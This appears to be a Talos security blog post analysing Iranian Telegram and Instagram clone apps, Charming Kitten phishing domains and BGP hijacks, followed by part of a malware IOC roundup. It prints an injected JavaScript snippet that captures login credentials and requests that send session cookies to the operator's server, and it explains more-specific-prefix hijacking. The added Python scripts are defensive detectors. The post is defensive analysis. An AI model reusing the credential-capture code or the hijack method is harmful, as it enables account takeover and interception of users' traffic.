Once installed, some of these Telegram "clones" have access to mobile devices' full contact lists and messages, even if the users are also using the legitimate Telegram app. In the case of phony Instagram apps, the malicious software sends full session data back to backend servers, which allows the attacker to take full control of the account in use. We declare with high confidence that these apps should be classified as "greyware." It is not malicious enough to be classified as malware, but is suspicious enough to be considered a potentially unwanted program (PUP). This kind of software is difficult to detect, as it typically fulfills the functions that the user expects of it (e.g., sending messages). The only time this kind of software is detected by security researchers is if it has an impact somewhere else. Talos eventually discovered several pieces of software that have the potential to be used in far-reaching campaigns. We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country.
Another method we saw in the Iranian attacks was the creation of fake login pages. Even though this isn't an advanced technique, it is effective against users who aren't as aware of cybersecurity as they should be. Iran-connected groups like "Charming Kitten" have been using this technique for a while, targeting secure messaging apps. Some actors are also hijacking BGP routes. This technique redirects traffic at the routing level, without the routers involved verifying the origin of those new routes. In order to hijack BGP, there needs to be some sort of cooperation from an internet service provider (ISP), and it is easily detectable, so the new routes won't be in place for very long.
Talos hasn't found a solid connection between the several attacks we've observed, but all of them target Iran and its nationals and the Telegram app. Although this post focuses on Iran, mobile users across the globe still need to be aware that these techniques could be used by any threat actor in any country, state-sponsored or not. This is especially prevalent in countries like Iran and Russia, where apps like Telegram are banned, and developers create clones that appear on official and unofficial app stores to replicate Telegram's services.
A regular user can't do anything about BGP hijacking, but using legitimate applications from the official application stores reduces the risk. The same rule applies to the cloned applications: installing applications from untrusted sources implies a certain degree of risk that users must be aware of. In both situations, this risk is substantially increased when the applications are unofficial "enhanced functionality" applications, even when they are available on the official Google Play store.
Tactics
Functionality enhancement applications (grey)
and Cambridge Universal Academy
Description of

Talos identified a software developer completely focused on the Iranian market. The publisher goes by the name "" on both iOS and Android platforms. It develops software intended to increase users' exposure on social media networks, like Instagram, as well as the number of Iranian users on certain Telegram channels.
While looking at the website, and more specifically the installation links, it is clear that none of these applications are published in the official application stores (Google or Apple), which is likely due to sanctions put in place against Iran by the U.S. government.
Whois information for
The domain is registered with the [email protected] email address. This is the same email address used to register other domains for the cloned Instagram and Telegram applications (see other sections below).
Talos identified various domains after analysing the whois information associated with the domain andromedaa[.]com, all but one registered with the same phone number.
Partial list of the domains found
We scanned the IP address associated with the aforementioned domains, which revealed a pattern in their use of SSL certificates.
Certificate information
This SSL certificate analysis revealed an additional domain — flbgr[.]com — whose whois information was privacy protected. Based on the low prevalence of those values in the SSL certificate, Talos associates this domain with the same threat actor with high confidence. The domain flbgr[.]com was registered on Aug. 6, 2018, making it the most recently registered domain, and resolved to the IP address 145.239.65[.]25. Cisco Farsight data showed other domains also resolve to that same IP address.
List of domains associated with the same IP address
Talos then discovered an SSL certificate with a common name of followerbegir[.]ir that had a sha256 fingerprint. We also found another certificate that was very similar in nature. However, there appeared to be two typos: one in the common name field "," and another in the organization field where it's identified as "andromeda," instead of andromedaa.
Certificate information
Description of Cambridge Universal Academy
published the iOS application, but it's signed with a developer certificate issued to Cambridge Universal Academy Ltd. This is an England and Wales-registered company that offers iOS development services. This same company is owned by an Iranian citizen who owns at least four other companies in four different countries: England, U.S., Turkey and Estonia. All of those companies share the same services, offering a web page similar in content.

Google flagged the URL for phishing, which might be related to the fact that this site, along with, are offering visa services for the U.K., U.S., Canada, Australia and other countries in the European Economic Area.

Business model

All of the applications are meant to increase users' exposure on Instagram or Telegram by increasing the likes, comments, followers or even the number of users in a specific Telegram channel. All this comes with the guarantee that only Iranian users will perform such actions. The same operator also manages (see previous section) sites like, which sells the same kind of exposure.
Price list (original HTML errors were kept, translation by
While these services are not illegal, they definitely are "grey" services. On the same site, we can see marketing that highlights the benefits of using this service rather than others.
marketing (translation by
It's worth noting that the operators state that they will never ask for the customer's password for Instagram and that all of the site's users are real. The reality is that the operator doesn't need the customer's password for Instagram because an Instagram user doesn't need to log into that user's account to "like" their post.
Instead, the operator has access to thousands of user sessions. They have access to all users that have installed the "free" applications, meaning they can do whatever they want during those sessions. While the operator uses a different method for the Telegram applications, those can also lead to complete session takeover. See the "Application examples" section for more details.
The danger here is not that this operator can make money, it's that users' privacy is at risk. The same methods applied to control Instagram and Telegram accounts give the operator access to the user's full contact list, future messages on Telegram, and the user's full Instagram profile. Iran banned the usage of these sites, especially Telegram, since chats can be encrypted, locking out government access. By using these methods, the operator could compromise the endpoint and access all future chats.
Although most of the backend is hosted in Europe, all the tested applications perform an update check against a server located in Iran. Again, this is not malicious per se, but given the context of forbidden applications, this potentially gives the government a single point of access to thousands of mobile devices. However, Talos cannot establish a direct relationship between this operator and any government entity, Iranian or otherwise.
Application examples
Follower Begir Instagram iOS application
The first application we analyzed was فالوئر بگیر اینستاگرام ("Follower Begir Instagram") designed for iOS. published this application, and it's signed by Cambridge Universal Academy. This application is an overlay to Instagram.
First screen after logging in
The developer added some features such as virtual currency and Persian language support, among others.
Certificate information
The application uses the iOS WebKit framework in order to display web content, which in this case displays the Instagram page. Upon the first execution, the application displays the Instagram login page injected with the following JavaScript snippet.
document.addEventListener('click', function() {
  try {
    // read the Instagram login form fields on every click in the page
    var tu = document.querySelector('[name="username"]');
    var tp = document.querySelector('[name="password"]');
    var tpV = (typeof tp == 'undefined') ? '' : tp.value;
    var tuV = (typeof tu == 'undefined') ? '' : tu.value;
  } catch (err) {
    // querySelector returns null (not undefined) when a field is absent, so the
    // typeof guard never triggers and the .value access lands here instead
    var tuV = '';
    var tpV = '';
  }
  var bd = document.getElementsByTagName('body')[0].innerText;
  var messageToPost = {
    'pu': tuV,   // username
    'pp': tpV,   // password
    'bd': bd     // full text of the page body
  };
  // the object is then posted to the native app's script message handler
});

The purpose of this code is to give the control to the iOS application when the user clicks the "Connection" button. The application receives an event, and the value of the username and password fields, along with the body of the page. The event is handled by the followerbegir.AuthorizationUserController userController:didReceiveScriptMessage() function. Afterward, the application authenticates on Instagram servers.
During this investigation, we discovered that the password was not directly sent to the backend server (v1[.]flbgr[.]com). Here is the data sent to the ping.php web page:

POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]&user_details=[redacted]&tokenNumber=[redacted] HTTP/1.1
SESSIONID: [redacted]
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Connection: close
Accept: */*
Accept-Language: fr-fr
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Encoding: gzip, deflate
Content-Length: 0

The operator of the backend server receives the mobile type (iOS), token and user data, such as username, profile picture and full name, if the account is private.
The SESSIONID variable contains the most sensitive information: the header of an Instagram connection with the valid cookie. The owner of the server can hijack the Instagram session of the user with the information available in this field.
The application has an update mechanism, which is based out of Iran, unlike the majority of the infrastructure. When the application starts, it sends a request to ndrm[.]ir with the current version of the app:
POST /start/fl.php?apk=35&m=ios HTTP/1.1
Connection: close
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Accept: */*
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Content-Length: 0

If the version is not up to date, the application redirects the user to the andromedaa store:
Instructions to trust the developer certificate
The store contains the new version of the application and a procedure to trust the previously mentioned developer certificate. This allows the developers to update both the certificate trust and the application at any point in time.
Ozvbegir(ozvdarozv) application

The Ozvbegir application's intent is to increase the number of members of the user's Telegram channel. This app guarantees that these will only be Iranian users.
Application description (translation by Google Translate)
We analyzed the Android version of the application. The application package is signed by a self-signed certificate that's valid until the year 3014.
Most recent Ozvbegir certificate
Previous versions of the same application also used a self-signed certificate, but both the issuer and the subject information was clearly false.
Older versions certificate
Just like the previous application, the Ozvbegir application is repackaged and includes original classes from the Telegram application.
Ozvbegir classes structure
In fact, we found signs in the manifest that this package was actually the original Telegram package, which was changed to accommodate the application code. The names and labels used on the manifest have several references to the Telegram original application and even the API key used for the Android Maps app was kept the same.
Update check and reply
Just like the previous application, this one also checks for new versions by performing an HTTP request to the domain. If the application is not the latest version, it receives both a message and a link to obtain the most recent version, which can be anything the operator wants. In this case, it's from, an Iranian Android application store.
The domain is registered under the same email address as all the other application-supporting domains. However, this is the only one that is actually hosted in Iran and, coincidentally, is the one with the ability to upgrade the application on mobile devices.
The application has a look and feel that strongly resembles the original Telegram application. Just like the original Telegram application, the user is requested to provide their phone number to register in Telegram when they first open the app.
Phone number request
This registration creates a shadow session for the same device, giving the application access to the full contact list and future messages.
Sessions created on a single phone
The application contacts the backend server when the registration process is finished, supplying information about the user and the mobile device.

GET /users/ping.php?access_hash=[redacted]&inactive=0&flags=1107&last_name=%21%21empty%21%21&phone=[redacted]&tg_id=[redacted]&m=d&user_name=[redacted]&first_name=Pr2&network=SYMA&country=[redacted]&apk=570&imei=[redacted]&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29&tut=[redacted] HTTP/1.1
TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1
NUM: df27340104277f1e73142224d9cb59e8
ADMIN: web
Connection: close
User-Agent: Apache-HttpClient/4.5.1 (java 1.4)

We identified more than 1 million subscribers on the Telegram channel who automatically joined when they first opened the application.
Channel information

Bitgram_dev, unlike the previous developers, does not have a large internet footprint. Currently, it has two published applications — AseGram and BitGram — on Google Play. The applications were available from the beginning of September to the beginning of October and were downloaded almost 10,000 times.
AseGram and BitGram on Google Play
Publisher information
Given that AseGram and BitGram aim to circumvent the ban that Iran put on Telegram, it's reasonable to think that the publishers would want to have a small footprint as a self-preservation measure.
Application examples

The AseGram application is available on the Google Play store for certain countries. Even though the application was downloaded from the Google Play store, the certificate signing the package is completely useless security-wise.
AseGram certificate
This Telegram clone was clearly created to intercept all communications from the user. However, this one takes a different approach than the others: this software uses a proxy defined at the Telegram package layer in order to intercept traffic.
Set proxy code
Just like in previous applications, AseGram is a repackaging of the legitimate Telegram for Android. This technique avoids all the problems that a developer may find when trying to implement its own Telegram client.
The service org.pouyadr.Service.MyService starts upon boot. This calls the MessagesController.getGlobalMainSettings() from the original Telegram package and will change the settings to include the proxy configuration.
The configuration details are hardcoded into the malware and are encrypted using AES with a key derived from hardcoded values concatenated with package-specific values.
The application contacts three domains:, and, all of which are registered to companies in Iran. In this case, the application administrator has access to the communications. This application creates a service that can't be disabled just by closing the application and starts when the device boots up. The service contains the necessary code to install new packages, but the action is handled by the standard package manager in the system. This service is also responsible for contacting IP addresses located in Iran. In fact, this uses the back end of the Telegram clone called "Advanced Telegram," or (Golden Telegram). This application is available at, an Iranian state-sanctioned Android application store.
Advanced Telegram cafebazaar page (translation by Google Translate)
It is important to emphasize that the first sentence on this page is "این برنامه در چارچوب قوانین کشور فعالیت میکند" ("This program operates within the framework of the laws of the country"). It is hard to find a legitimate use case where an application that circumvents a ban should contact the same servers used by a cloned application that is vetted by the same country that applied the ban, making these communications highly suspicious.
The application also contains code to use SOCKS servers located in several countries, which can be used to circumvent the ban. However, during our research we never saw these being used. On the other hand, even when the physical device isn't in Iran, we have seen traffic going to servers located in the country, which doesn't seem compatible with an application that is trying to avoid a ban on Telegram in Iran.
Fake websites
Spoofed Telegram Websites
The most straightforward approach to gain access to an end-user's Telegram account is to socially engineer the user into entering their username and password into a fraudulent website controlled by the attacker. We observed the domain youtubee-videos[.]com in the wild, which mimicked the web login page for Telegram.
Fake Telegram login page
This domain was registered on July 25, 2017. Its tactics, techniques and procedures (TTPs), such as the domain registration pattern, the email address ([email protected][.]com) used to register this and other domains, and its passive DNS (pDNS) records, suggest that the domain is associated with the Charming Kitten group. The same domain was independently associated with Charming Kitten by another cybersecurity firm, ClearSky. Upon further inspection of the web page source code, it appears that the website was built using the GitHub project "Webogram"; there were also strings in the page source suggesting that the site's display was designed for iPhones.

Source code reference
Newly identified Charming Kitten domains
While Talos was researching the spoofed Telegram websites used by the Charming Kitten actors, we discovered a number of other malicious domains containing keywords such as "mobile," "messenger," and, in some cases, "hangouts," likely a reference to the Google chat application Hangouts. This suggests that these actors have a continuing interest in gaining access to end users' mobile devices, and specifically their chat messages.
These domains were also registered using the same modus operandi as all the other domains associated with this group in 2017. By analyzing pDNS records, Talos discovered additional domains that resolved to the same IP address.

This clearly demonstrates that the group has ongoing activity focused on user credentials and messaging applications.
BGP Routing Anomalies
While monitoring BGPStream, Cisco's database of Border Gateway Protocol (BGP) announcements, Talos noticed routing anomalies originating from the Iranian autonomous system number (ASN) 58224. For those unfamiliar with the protocol, RFC 4271 defines BGP as "an inter-Autonomous System routing protocol." In this context, "a route is defined as a unit of information that pairs a set of destinations with the attributes of a path to those destinations." In short, this protocol allows internet communication to occur when a requested resource is located outside the requesting network or autonomous system.
BGP is used across the internet to select the best path for routing. It is important to note that this can be manipulated at the ISP level, depending on the various factors that BGP allows for route selection. BGP optimizes the routing of internet traffic through the "speaking system," which RFC 4271 defines as follows:

The primary function of a BGP speaking system is to exchange network reachability information with other BGP systems. This network reachability information includes information on the list of Autonomous Systems (ASes) that reachability information traverses.

These speaking systems serve as a platform for routers to send "update messages" to neighboring systems. The process for "changing the attribute(s) of a route is accomplished by advertising a replacement route. The replacement route carries new [changed] attributes and has the same address prefix as the original route."

While this was designed as a feature to deal with networking problems, no adequate security mechanism was added to prevent it from being abused. BGP offers no protection beyond optional measures such as TCP MD5 authentication of neighbor sessions, IPsec, or GTSM, and none of these is required by default, so they are not necessarily widely used. These measures only protect the session between two directly connected peers; they do not let a router verify that the announcing AS is entitled to originate a prefix, which is what Route Origin Validation with RPKI adds, and that was still sparsely deployed in 2018. The result is that an operator can send an update message carrying an alternate route to the same prefix, or to a more specific prefix, even when there is nothing wrong with the primary route. Because routers prefer the longest matching prefix, announcing a more specific sub-prefix of a victim's range captures that traffic regardless of the other path attributes. This can cause some traffic to pass through a predetermined or sub-optimal route chosen by the actor. These routing deviations are commonly referred to as BGP hijacks. A hijack's effectiveness is measured by the number of BGP peers that receive the update: the more peers that accept the update message, the more traffic is likely to be routed through the alternative path pre-configured by the actor.
Pre-Planned Routing Activity from ASN 58224
One interesting BGP routing anomaly occurred on June 30, 2018 at 07:41:28 UTC. During this event, the Iranian-based ASN 58224 announced an update for the prefix The Iranian telecommunications provider Iran Telecommunication Company PJS owned the ASN that sent out the update message.
The range that was potentially hijacked belongs to the Hungarian internet service provider (ISP) DoclerWeb Kft. Nine BGPmon peers detected this event, which lasted two hours and 15 minutes until a new update message was disseminated. While this event was small in scale, it could have been a trial run for a larger BGP hijack attempt.
More significant BGP anomalies originated from the same Iran-based ASN 58224. On July 30, 2018 at 06:28:25 UTC, four BGP routes were announced as "more specific" prefixes at exactly the same time, down to the second, affecting communications with Telegram. When routers received this update message, they began routing some traffic destined for the Telegram servers through ASN 58224. This campaign proved particularly effective: a large number of BGPmon peers observed it, suggesting that it propagated throughout the region. Just as in the event one month earlier, routers received a corrected update message two hours and 15 minutes later, ending the hijack.
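As an added example that is not part of the Talos post, the following Python implements the two checks a route monitor applies to an announcement like the July 30 one: longest-prefix match (which is why a more specific wins over the legitimate route) and classification of each announcement against the expected origin AS, plus a burst detector for several more-specifics appearing from one AS in the same second. All prefixes, timestamps, peer counts and the origin ASN 64500 are constructed for the example; only AS58224 comes from the post, and the ranges are documentation prefixes, not the real Telegram ranges.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Announcement:
    """One BGP update as seen by a route monitor (constructed record format)."""
    timestamp: str    # second at which the monitor's peers saw the update
    prefix: str       # announced prefix, e.g. "203.0.113.0/25"
    origin_asn: int   # last AS in the AS_PATH, i.e. the claimed originator
    peers_seen: int   # number of monitor peers that received the update


# Constructed ground truth: the origin AS expected for each prefix. In practice
# this comes from the operator's own inventory, IRR/RPKI data or route history.
EXPECTED_ORIGINS = {
    "203.0.113.0/24": 64500,  # hypothetical "Telegram" range A
    "192.0.2.0/24": 64500,    # hypothetical "Telegram" range B
}


def best_route(routes, dst):
    """Longest-prefix match: the announcement a router actually uses for dst.

    This is why a more-specific hijack works: a /25 beats the legitimate /24
    for every address it covers, regardless of any other path attribute."""
    dst = ipaddress.ip_address(dst)
    covering = [r for r in routes if dst in ipaddress.ip_network(r.prefix)]
    return max(covering,
               key=lambda r: ipaddress.ip_network(r.prefix).prefixlen,
               default=None)


def classify(ann, expected=EXPECTED_ORIGINS):
    """Label one announcement against the expected-origin table."""
    net = ipaddress.ip_network(ann.prefix)
    for known, asn in expected.items():
        known_net = ipaddress.ip_network(known)
        if net == known_net:
            return "ok" if ann.origin_asn == asn else "origin-hijack"
        if net.subnet_of(known_net):
            # Covered by a known range: fine if the rightful origin is doing
            # traffic engineering, a hijack if anyone else announces it.
            return "ok-more-specific" if ann.origin_asn == asn else "more-specific-hijack"
    return "unknown-prefix"


def find_bursts(announcements, expected=EXPECTED_ORIGINS, min_prefixes=2):
    """Group hijack-labelled announcements by (timestamp, origin AS).

    Several more-specifics for a victim appearing in the same second from one
    AS is the pattern the July 30 event shows; a lone stray announcement is
    more often a configuration mistake or a route leak."""
    groups = defaultdict(list)
    for a in announcements:
        if classify(a, expected).endswith("hijack"):
            groups[(a.timestamp, a.origin_asn)].append(a.prefix)
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_prefixes}


# Constructed feed: the legitimate /24s, four simultaneous more-specifics from
# AS58224, and a later legitimate more-specific from the rightful origin.
SAMPLE_FEED = [
    Announcement("2018-07-30T06:28:25Z", "203.0.113.0/24", 64500, 40),
    Announcement("2018-07-30T06:28:25Z", "192.0.2.0/24", 64500, 40),
    Announcement("2018-07-30T06:28:25Z", "203.0.113.0/25", 58224, 22),
    Announcement("2018-07-30T06:28:25Z", "203.0.113.128/25", 58224, 22),
    Announcement("2018-07-30T06:28:25Z", "192.0.2.0/25", 58224, 22),
    Announcement("2018-07-30T06:28:25Z", "192.0.2.128/25", 58224, 22),
    Announcement("2018-07-30T06:40:00Z", "192.0.2.0/25", 64500, 38),
]


if __name__ == "__main__":
    for key, prefixes in find_bursts(SAMPLE_FEED).items():
        print(f"{key[0]} AS{key[1]} announced {len(prefixes)} more-specifics: {prefixes}")
    via = best_route(SAMPLE_FEED, "203.0.113.10")
    print("203.0.113.10 would be routed via AS", via.origin_asn)
```

The peers_seen field is carried but not used for classification on purpose: propagation width tells you how bad a hijack is, not whether it is one. A monitor would weight alerts by it, which is what the BGPmon peer counts in the events above express.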

How BGP Hijacking could have enabled computer network operations
Theoretically, this announcement could have been one component of an operation to compromise communications with Telegram servers. The hijack caused some Telegram traffic to be sent to an Iranian telecommunications provider. Other nation-state actors have used this technique to deliver malware, as documented by other security researchers two months earlier, in May 2018. Once traffic is routed through the desired ISP, it can be inspected and modified. A caveat: Telegram's client-server protocol is encrypted, so an on-path provider sees metadata (client addresses, timing, volume) and can delay or drop traffic, but reading message content needs something more, such as the account takeover described next. Open-source reporting suggests that Iran-based telecommunication providers have previously cooperated with Iranian government requests to obtain communications; one article suggests that telecommunications companies provided government officials with the Telegram SMS verification codes needed to gain access to Telegram accounts.
This capability would be attractive because it could allow the actors to route traffic from neighboring ASNs through Iran, reaching devices in nearby countries and users of non-Iranian telecommunications providers.
The Iranian Minister of Information and Communications Technology, Mohammad-Javad Azari Jahromi, acknowledged this event and stated it will be investigated. Nothing further has been publicly released regarding this investigation from the Iranian government.
The three techniques discussed here are not the only ones that state-sponsored actors can use to deploy surveillance mechanisms targeting their citizens. Mass internet firewalling and surveillance deployments have been in the news before, and some of these campaigns have also targeted specific applications, such as Telegram. However, these apparently unrelated events all share at least two common denominators: Iran and Telegram. These denominators should be far apart, since Iran has banned Telegram in the country. Yet we found several Telegram clones, with several thousand installations, that contact IP addresses located in Iran, some of which advertise the fact that they can circumvent the ban. The activity of these applications is not illegal, but it gives their operators total control over the messaging applications and, to some extent, over users' devices.
The long-running activity of groups like Charming Kitten, even when using classic phishing techniques, remains effective against users who are not very aware of cybersecurity. Given that the common denominator of all of these activities was the victims' citizenship, it is understandable that the vast majority of any country's population will not be as cybersecurity-educated as a professional, so even this classic technique can be highly effective.
While it is impossible for Talos to determine precisely the intent behind the July 30 routing update messages, Talos assesses with moderate confidence that the updates were a deliberate act targeting Telegram-based services in the region. It is unlikely that four update messages would be distributed at exactly the same time, routing two different Telegram ranges through four different subnets all associated with one ASN, 58224, by accident. This assessment also takes into account open-source reporting on Iran's complicated history with Telegram, from laws banning its use to reports of outages caused by Telegram's IP addresses being blocked in Iran.
Aside from the victims and the applications, Talos was unable to find any solid link between these events. This investigation focused on Iran because of the current ban on Telegram. However, these techniques could be used by any malicious actor, with or without state sponsorship. Talos assesses with high confidence that users' privacy is at risk when using the applications discussed in this blog post. The overall security concerns should be taken seriously.
Xn--oogle-v1a[.]ga (ġoogle[.]ga)

Hash values
8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 - BitGram
24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 - AseGram
a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d - followerbegir.ipa
a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 - ozvdarozv.apk

Threat Roundup for Oct. 26 to Nov. 2

Fri, 02/11/2018 - 16:03

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 26 and Nov. 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with each cluster. The list in this blog post is limited to 25 hashes per cluster. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Zbot-6732674-0
    Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
  • Win.Malware.Sivis-6734391-0
    Sivis is a trojan that is usually downloaded from the internet and installed by unsuspecting users. This variant also includes sandbox-evasion logic and can move numerous files to the Recycle Bin.
  • Win.Malware.Explorerhijack-6734396-0
    This malware changes the user's browser home page, redirects the user to suspicious websites, and leads them to advertisements and commercial content that generates pay-per-click revenue for its developers.
  • Xls.Malware.Cwsp-6735643-0
    This is an Excel-based downloader that uses PowerShell to retrieve the next-stage executable. Microsoft Office displays a warning to the user before the payload is activated.
  • Win.Trojan.Mikey-6735890-0
    This cluster focuses on malware that creates a specific cluster so the malware can achieve persistence. The samples use anti-analysis tricks to complicate analysis. This family is known for its plugin architecture and intense network activity. This week, Mikey used the AppWizard packaging system, which is based on common Microsoft code using the Microsoft Foundation Classes (MFC) to start a simple application. Malicious programs use this packer to stage process hollowing and obfuscate the malicious code.
Indicators of Compromise
Registry Keys
  • <HKLM>\software\Wow6432Node\microsoft\windows nt\currentversion\winlogon
    • Value Name: userinit
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\SysWOW64\ntos.exe
File Hashes
  • 0105bb0a81ceb78f84de07f7336a6ecdd95721545b3e47c96ae45f94a8fe8506
  • 0114885e69a066a72f12eb475c9ae36e0851309ce6902a547dd60915ab785523
  • 01be29f0973f96218bf0554f2212ee60fe8563a9fa5e9f1cc04b948a02a5989a
  • 0280026374e8bc24bd0987abde9c8ded202bc489e0f718c2fbd87d541f2003e0
  • 03262248439bc3ed3af3cc12a50d3595a0230b6a01fd3c6e34838750a01a4b72
  • 03480a5dda4243eec0e9826a386729670c50c9cdcfd12109febf16695e7302ce
  • 03746100716d1a66312b69c03ba2166aab6075f24ca826197972bf30a117dadb
  • 03c2c34bd542dde2d600697bb658399498be9ff74614ab938adb3f77a4183c4c
  • 0462f5a9a36956eb62b958203d66e1ad83268502f7ee6a2676e47d3829db1e03
  • 06c57ae21c9f839895f847a5d8895fdc89e878a615565772246c94887caaf6cb
  • 075b5ad9b36d79b3b14ad43decabdd7f07fbd3d428e890a14ee2af4969ba49e5
  • 08866b56758d4c7b783af2faa3465a9c3dcb2621b19ded098ccb17e25e4f685a
  • 08db11f50735c3f4d34d308bc190ae8db0cc6b291090716781ced208b13743fa
  • 0a00e118d1917356a4598d2e5f3a96f184726cb37e6be4cfa70ad233fcf5be8a
  • 0a0e93af895754435be151f0f09d3fcd542661c9e48314a82bfa4853be9212fe
  • 0a4d7fbd10835ba00bd6518598f0c3a4670207e52e4c8c57a5500f0c4059a017
  • 0a963367e108b56e58559846236f1896adcca5ec6e324330739e3b45d436e1dd
  • 0b675493051c7f99878bca3510c5054bbc071612557acb008e9ae8980c6364ed
  • 0b7143f5062cada3d26a97f59b10ddf8e2a73ea70dc97c7cb55a5ceef7e7e5d8
  • 0b76777a484d6e0304bfc0b0c06576a51bca2a5cf6a648dfdf67f296301af3d4
  • 0bc190d365d58acc24ec202637d87296c69c9f2d2dc4e7120d8f3b61ffc584bc
  • 0c4533fd8ae2a9629f474373ce2697059e978e8f5945b4421d092a7052b9c64c
  • 0e12afb0ec9aca39a02927e158883994dc6110f83880b5075aebcaed8077ce36
  • 0ef146b745e8b57ed0f3b0cd888f650fb8510670731e5c01419e13722178d1d9
  • 114f30f079e04714958728d7364b706dd8e88a241bd0771326d10c445d4fc95c

Screenshots of Detection (AMP)
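The first IOC block above (the Winlogon userinit value together with %WinDir%\SysWOW64\ntos.exe) is the classic Zbot persistence pattern: the trojan inserts its own executable into the comma-separated Userinit list so that Winlogon launches it at every logon, usually leaving the genuine userinit.exe in the list so that logon still works. The Python below is an added example, not part of the Talos roundup; it checks a Userinit value offline the way a hunting script would. The registry values it tests are constructed, and reading the live value on a Windows host (for example with winreg) is left to the caller.

```python
import ntpath

# The only entry a clean Winlogon Userinit value should contain, relative to
# the system root. Windows launches each comma-separated entry at logon; a
# trailing comma is normal.
GENUINE_USERINIT = r"system32\userinit.exe"

# Drop path from the IOC list above, used to tag a rogue entry as the Zbot drop.
ZBOT_DROP = r"%WinDir%\SysWOW64\ntos.exe"


def parse_userinit(value):
    """Split the REG_SZ Userinit value into its launch entries.

    Strips surrounding quotes and whitespace and drops the empty element
    produced by the trailing comma."""
    entries = []
    for part in value.split(","):
        part = part.strip().strip('"').strip()
        if part:
            entries.append(part)
    return entries


def normalize(path, system_root=r"C:\Windows"):
    """Canonical, case-insensitive form so that %SystemRoot%, forward slashes
    and mixed case cannot be used to slip past a naive string comparison."""
    expanded = path
    for var in ("%SystemRoot%", "%systemroot%", "%WinDir%", "%windir%"):
        expanded = expanded.replace(var, system_root)
    return ntpath.normpath(expanded).lower()


def check_userinit(value, system_root=r"C:\Windows"):
    """Return {'rogue': [...], 'missing_userinit': bool} for a Userinit value.

    'rogue' lists every entry that is not the genuine userinit.exe (a Zbot
    ntos.exe entry lands here); 'missing_userinit' is True when the genuine
    binary has been removed entirely, the more disruptive variant and a sign
    the value was rewritten rather than extended."""
    expected = normalize(ntpath.join(system_root, GENUINE_USERINIT), system_root)
    rogue, seen_genuine = [], False
    for entry in parse_userinit(value):
        if normalize(entry, system_root) == expected:
            seen_genuine = True
        else:
            rogue.append(entry)
    return {"rogue": rogue, "missing_userinit": not seen_genuine}


def matches_zbot_drop(entry, system_root=r"C:\Windows"):
    """True when a rogue entry is the ntos.exe path from this roundup's IOCs."""
    return normalize(entry, system_root) == normalize(ZBOT_DROP, system_root)


if __name__ == "__main__":
    # Constructed values, not read from a real host.
    for sample in (r"C:\Windows\system32\userinit.exe,",
                   r"C:\Windows\SysWOW64\ntos.exe,C:\Windows\system32\userinit.exe,"):
        result = check_userinit(sample)
        tags = [("ZBOT " if matches_zbot_drop(e) else "") + e for e in result["rogue"]]
        print(sample, "->", result["missing_userinit"], tags)
```

On 64-bit Windows, check both the native HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon key and the Wow6432Node view listed in the IOCs, and treat any rogue entry as a finding even if it is not ntos.exe: the check flags the technique, the hash list identifies the family.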


Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • \$Recycle.Bin\<USER-SID>\$RZ7KADN.txt
  • \$Recycle.Bin\<USER-SID>\$RYGDGS7.lnk
  • %AppData%\Mozilla\Firefox\Profiles\iv5rtgu3.default\key3.db
File Hashes
  • 2073825ad497c12861800c93527e49e8aa4afafe77d1a7af2922ab707c4b258e
  • 2c43a96efe6f36ef0e1e1ca7f4dfe34c83bdd1d99090a056d43955e70bae719f
  • 2ff58a8b69dcb0dbb1ef63430a925068d586860c84faa583988b92e2bb87ef25
  • 30a9b4c8db8eae33a1e9c35f6441e171cb8059a0f6c34bc8d377e064f3000008
  • 32e5b6a36aa94734f0af2cc7d2235bbfeecc915fc0bc0bf46f385f238dc1b69d
  • 32fb050134eefd9bba3f5a1d31c9727c0a25760e8b2342385b24b20a253e9512
  • 34c5950ff21c25a4acbc1801f881d205ba2cae42333bb04358cf5117eef645b2
  • 447e4f61b3e3a5ccf116346d228d1b80328a63e54fc71398e4894d70c22ff51d
